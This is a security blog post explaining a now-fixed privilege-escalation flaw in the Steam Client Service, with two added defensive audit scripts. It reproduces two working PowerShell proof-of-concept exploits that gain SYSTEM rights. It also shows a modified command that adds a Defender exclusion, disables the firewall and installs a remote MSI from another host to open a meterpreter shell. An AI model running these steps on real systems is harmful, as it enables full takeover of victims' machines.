Update: Now Fixed

Last Wednesday a security researcher named Vasily Kravets published an article [1] detailing a “feature” of the Steam Client Service that could be abused by other programs to escalate their own privileges to that of SYSTEM [2]. SYSTEM is not actually an account, but for the purpose of this post you can think of this as a hidden account which has some additional permissions above the standard Administrator account [3].

After this article was released, another security researcher, Matt Nelson, published a tweet [4] linking to a PoC (Proof of Concept) PowerShell script [5]. The script reproduces the steps that any process on your computer could take to elevate itself and obtain SYSTEM permissions.
Here are the contents of the PowerShell script:
Write-Host "[*] Installing NTObjectManager..."
install-module NTObjectManager -Scope CurrentUser -Force
import-module NTObjectManager
Write-Host "[*] Removing HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
Remove-Item -Path "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
Write-Host "[*] Creating Registry Symbolic Link from HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS to HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service"
[NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Valve\Steam\NSIS",$null, "\REGISTRY\Machine\SYSTEM\CurrentControlSet\Services\Steam Client Service")
Write-Host "[*] Registry Symbolic link created, restarting the Steam Client Service"
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Sleeping 5 seconds"
Start-Sleep 5
Write-Host "[*] DACL on HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service should be overwritten"
Write-Host "[*] Modifying the binPath on the Steam Client Service..."
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" -Name "ImagePath" -Value "C:\Windows\System32\cmd.exe /c cmd.exe"
Write-Host "[*] binPath overwritten, restarting the service to trigger EoP. This will error out, just ignore it"
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Done, cmd.exe should now be running as NT AUTHORITY\SYSTEM"
I won’t describe what this script does, because it was improved somewhat by roflsandwich [6] and I will describe that version instead. Just be aware that you SHOULD NOT run the above PowerShell script: it deletes a Steam registry key and never restores the service’s ImagePath, so it will break Steam completely. Unless you’re working on a VM (Virtual Machine) and have backed up the registry first, don’t play with it.
Here are the contents of the slightly improved script by roflsandwich:
$cmd = Read-Host -Prompt 'Enter the command you wish to execute as system'
Write-Host "[*] Installing NTObjectManager..."
install-module NTObjectManager -Scope CurrentUser -Force
import-module NTObjectManager
Write-Host "[*] Creating Registry Symbolic Link from HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\Apps\PrivEsc to HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service"
[NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Valve\Steam\Apps\PrivEsc",$null, "\REGISTRY\Machine\SYSTEM\CurrentControlSet\Services\Steam Client Service")
Write-Host "[*] Registry Symbolic link created, restarting the Steam Client Service"
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Sleeping 5 seconds"
Start-Sleep 5
Write-Host "[*] DACL on HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service will be overwritten"
Write-Host "[*] Modifying the Binary Path on the Steam Client Service..."
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" -Name "ImagePath" -Value "C:\Windows\System32\cmd.exe /c $cmd"
Write-Host "[*] Binary Path overwritten, restarting the service to trigger EoP. This will error out, just ignore it"
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Done, the command $cmd has been executed"
Write-Host "[*] Restoring Binary Path on the Steam Client Service..."
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" -Name "ImagePath" -Value "`"C:\Program Files (x86)\Common Files\Steam\SteamService.exe`" /RunAsService"
Write-Host "[*] Binary Path Restored, restarting the Steam Client Service..."
Get-Service "Steam Client Service" | Restart-Service
Get-Service "Steam Client Service"
Write-Host "[*] Done."
In essence, this script exercises a vulnerability that any program could abuse on any Windows 10 computer with Steam installed. Here is what the script does:
- Creates a new key, HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\Apps\PrivEsc, which only requires USER permissions to create, but which is a symbolic link to HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service, a key that requires SYSTEM permissions.
- Restarts the Steam Client Service, which overwrites the DACL on HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\Apps\PrivEsc. Because that key is a link, the overwritten DACL lands on the Steam Client Service key, so the unprivileged user can now write to it (the author notes this step also “backs up” the original Steam Client Service key).
- Replaces the Steam Client Service ImagePath value "C:\Program Files (x86)\Common Files\Steam\SteamService.exe" /RunAsService with "C:\Windows\System32\cmd.exe /c $cmd".
- Restarts the Steam Client Service, which then executes "C:\Windows\System32\cmd.exe /c $cmd" with SYSTEM privileges.
- Restores the original value "C:\Program Files (x86)\Common Files\Steam\SteamService.exe" /RunAsService.
- Restarts the Steam Client Service again to restore normal functionality.
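The steps above leave three artifacts a defender can look for: a registry symbolic link under the Steam key, a changed ImagePath on the service, and a service-key DACL that grants write rights to ordinary users. The following script is an added, read-only example written for this post (it is not the PoC and not Valve's code). It assumes a 64-bit PowerShell session run from an elevated prompt, Steam installed at its default path, and the service and key names quoted above; the P/Invoke wrapper, function names and the low-privilege principal list are my own choices.

```powershell
# Added example: audit a host for the conditions the Steam Client Service PoC relies on.
# Assumptions: 64-bit PowerShell, elevated prompt, default Steam install path.

# A registry symbolic link is normally followed transparently, so to see the link itself
# the key must be opened with REG_OPTION_OPEN_LINK and its SymbolicLinkValue read.
Add-Type -Namespace RegLink -Name Native -MemberDefinition @'
[DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern int RegOpenKeyExW(IntPtr hKey, string lpSubKey, uint ulOptions, uint samDesired, out IntPtr phkResult);
[DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern int RegQueryValueExW(IntPtr hKey, string lpValueName, IntPtr lpReserved, out uint lpType, byte[] lpData, ref uint lpcbData);
[DllImport("advapi32.dll")]
public static extern int RegCloseKey(IntPtr hKey);
'@

$HKLM = [Microsoft.Win32.Registry]::LocalMachine.Handle.DangerousGetHandle()

function Get-RegistryLinkTarget {
    # Returns the link target of an HKLM-relative key, or $null if it is a normal key.
    param([string]$SubKey)
    $REG_OPTION_OPEN_LINK = 0x8
    $KEY_READ = 0x20019
    $REG_LINK = 6
    $h = [IntPtr]::Zero
    $rc = [RegLink.Native]::RegOpenKeyExW($HKLM, $SubKey, $REG_OPTION_OPEN_LINK, $KEY_READ, [ref]$h)
    if ($rc -ne 0) { return $null }
    try {
        $type = [uint32]0
        $size = [uint32]0
        # First call only sizes the buffer; a normal key has no SymbolicLinkValue and fails here.
        $rc = [RegLink.Native]::RegQueryValueExW($h, 'SymbolicLinkValue', [IntPtr]::Zero, [ref]$type, $null, [ref]$size)
        if ($rc -ne 0 -or $type -ne $REG_LINK) { return $null }
        $buf = New-Object byte[] ([int]$size)
        $rc = [RegLink.Native]::RegQueryValueExW($h, 'SymbolicLinkValue', [IntPtr]::Zero, [ref]$type, $buf, [ref]$size)
        if ($rc -ne 0) { return $null }
        # REG_LINK data is a UTF-16 native path (\REGISTRY\Machine\...) with no terminating null.
        return ([System.Text.Encoding]::Unicode.GetString($buf, 0, [int]$size)).TrimEnd([char]0)
    } finally { [void][RegLink.Native]::RegCloseKey($h) }
}

function Find-RegistryLinks {
    # Walks an HKLM-relative key tree and reports every subkey that is a symbolic link.
    param([string]$Root)
    $results = @()
    $stack = New-Object System.Collections.Stack
    $stack.Push($Root)
    while ($stack.Count -gt 0) {
        $path = $stack.Pop()
        try { $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey($path) } catch { continue }
        if ($null -eq $key) { continue }
        foreach ($name in $key.GetSubKeyNames()) {
            $child = "$path\$name"
            $target = Get-RegistryLinkTarget $child
            if ($target) {
                $results += [pscustomobject]@{ Key = "HKLM:\$child"; Target = $target }
            } else {
                $stack.Push($child)   # only descend into real keys, never through a link
            }
        }
        $key.Close()
    }
    return $results
}

function Test-SteamServiceImagePath {
    # Compares the service's ImagePath with the value the post shows as the original.
    $svcKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service'
    $expected = '"C:\Program Files (x86)\Common Files\Steam\SteamService.exe" /RunAsService'
    $item = Get-ItemProperty -Path $svcKey -Name ImagePath -ErrorAction SilentlyContinue
    $actual = if ($item) { $item.ImagePath } else { '<service key not found>' }
    [pscustomobject]@{ Expected = $expected; Actual = $actual; Matches = ($actual -eq $expected) }
}

function Get-WeakServiceKeyAces {
    # Lists Allow ACEs on the service key that give low-privilege principals SetValue
    # (FullControl includes it). By default only SYSTEM and Administrators may write here.
    $lowPriv = 'BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
    $setValue = [int][System.Security.AccessControl.RegistryRights]::SetValue
    $acl = Get-Acl -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service' -ErrorAction SilentlyContinue
    if (-not $acl) { return @() }
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $lowPriv -contains $_.IdentityReference.Value -and
        (([int]$_.RegistryRights -band $setValue) -ne 0)
    }
}

# Run the three checks and summarise; any non-zero count or a mismatch deserves a closer look.
$links = @(Find-RegistryLinks 'SOFTWARE\WOW6432Node\Valve\Steam')
$image = Test-SteamServiceImagePath
$aces  = @(Get-WeakServiceKeyAces)
"Registry links under the Steam key : $($links.Count)"
$links | Format-Table -AutoSize
"ImagePath as expected              : $($image.Matches)  ($($image.Actual))"
"Write ACEs for low-privilege users : $($aces.Count)"
$aces | Format-Table IdentityReference, RegistryRights -AutoSize
```

On a clean machine the link count and the ACE count are both 0 and the ImagePath matches. The roflsandwich script restores the ImagePath but never removes the link it created nor repairs the DACL, so the first and third checks still flag a host after the "restore" step has run.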
Now you might still be wondering why this is a problem. Having a cmd prompt run under SYSTEM privileges means that any number of things could happen here. Let me illustrate further by modifying one line of code.
Instead of having it execute:
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" -Name "ImagePath" -Value "C:\Windows\System32\cmd.exe /c $cmd"
Let’s execute this instead:
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" -Name "ImagePath" -Value "C:\Windows\System32\cmd.exe /c "cd C:\Users\User\Downloads && powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Windows\Installer' && netsh advfirewall set allprofiles state off && msiexec /q /i http://192.168.1.205/1.msi""
Note: 192.168.1.205 is another machine on my network which has all of the tools I need for penetration testing and security research.
So what exactly does this command do?
- Launches a silent command prompt.
- Changes directory to the Downloads directory.
- Adds an exclusion path (C:\Windows\Installer) for Real-Time Monitoring.
- Disables the firewall completely for all profiles. Note: This causes a pop-up and may not even be necessary, I just wanted to highlight the kind of control that the permissions give. You could also probably make this silent.
- Calls msiexec (Windows Installer) to download a payload called 1.msi from my other machine and runs it on the host.
- 1.msi is run which calls back to my computer giving me an interactive meterpreter shell.
- I now have full control over that machine.
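Each step in that command line leaves a trace a defender can query: the Defender exclusion is visible in the current preferences and in the Defender operational log, the firewall change shows up in the profile state, and every restart of the Steam Client Service is logged by the Service Control Manager. The script below is an added example written for this post, not the author's tooling; it assumes Windows 10 with the Defender and NetSecurity PowerShell modules present, an elevated prompt, and that the caller fills in the approved-exclusion list (the function names and the 24-hour lookback are my own choices).

```powershell
# Added example: check a host for the side effects the modified command line would leave behind.
# Assumptions: Windows 10, Defender and NetSecurity modules available, elevated prompt.

function Get-UnexpectedDefenderExclusions {
    # Returns Defender path exclusions that are not on the approved list.
    # The approved list is an assumption: populate it with the paths your environment actually sanctions.
    param([string[]]$Approved = @())
    $current = (Get-MpPreference).ExclusionPath
    @($current) | Where-Object { $_ -and ($Approved -notcontains $_) }
}

function Get-DisabledFirewallProfiles {
    # 'netsh advfirewall set allprofiles state off' flips Enabled to False on every profile.
    Get-NetFirewallProfile | Where-Object { -not $_.Enabled } | Select-Object Name, Enabled
}

function Get-DefenderConfigChangeEvents {
    # Event 5007 in the Defender operational log records a configuration change, which is
    # how an Add-MpPreference -ExclusionPath call appears after the fact.
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 5007; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, @{ Name = 'Change'; Expression = { $_.Message -replace '\s+', ' ' } }
}

function Get-SteamServiceStateChanges {
    # Event 7036 from the Service Control Manager is written on every service start/stop.
    # The PoC restarts the Steam Client Service several times within seconds, which is
    # unusual for a service that normally runs only while Steam itself is running.
    param([int]$Hours = 24)
    $filter = @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7036; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -like '*Steam Client Service*' } |
        Select-Object TimeCreated, Message
}

# Run the checks; empty output from the first two is the expected state on a healthy host.
'--- Defender exclusions not on the approved list ---'
Get-UnexpectedDefenderExclusions -Approved @()
'--- Firewall profiles currently disabled ---'
Get-DisabledFirewallProfiles
'--- Defender configuration changes (last 24h) ---'
Get-DefenderConfigChangeEvents | Format-Table -AutoSize
'--- Steam Client Service state changes (last 24h) ---'
Get-SteamServiceStateChanges | Format-Table -AutoSize
```

Note that these are host-local checks and a process running as SYSTEM can clear the logs it is recorded in, so forwarding the Defender operational log and the System log to a central collector before an incident is what makes them reliable.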
Some images to illustrate (screenshots from the original post are not reproduced here).
EoP (Escalation of Privilege) vulnerabilities in Windows are not uncommon, but in this context this is quite a serious issue. Steam itself is a service for downloading other programs, and is used by approximately 75 million people on Windows 10. The scale of Steam installations makes this a valuable target for malware developers.
Some scenarios where this might be abused include:
- A free game or any other app available on Steam.
- Developers that release a patch for programs you already have installed.
- New programs that you install/run which are aware of this vulnerability.
Obviously this proof of concept only highlights the basics. A malicious program that has been elevated to SYSTEM permissions can do a great deal more than this, and you would be none the wiser.
Additional Reading:
ArsTechnica
Forbes
The Register
Computing
The Inquirer
Tech Radar
Security Newspaper
Bleeping Computer
References:
[1] https://amonitoring.ru/article/steamclient-0day/
[2] https://docs.microsoft.com/en-us/windows/win32/services/localsystem-account
[3] https://support.microsoft.com/en-gb/help/120929/how-the-system-account-is-used-in-windows
[4] https://twitter.com/enigma0x3/status/1159103239729471488
[5] https://gist.github.com/enigma0x3/03f065be011c5980b96855e2741bf302
[6] https://gist.github.com/roflsandwich/6fb5df2abda912b9d33aad291c9f87de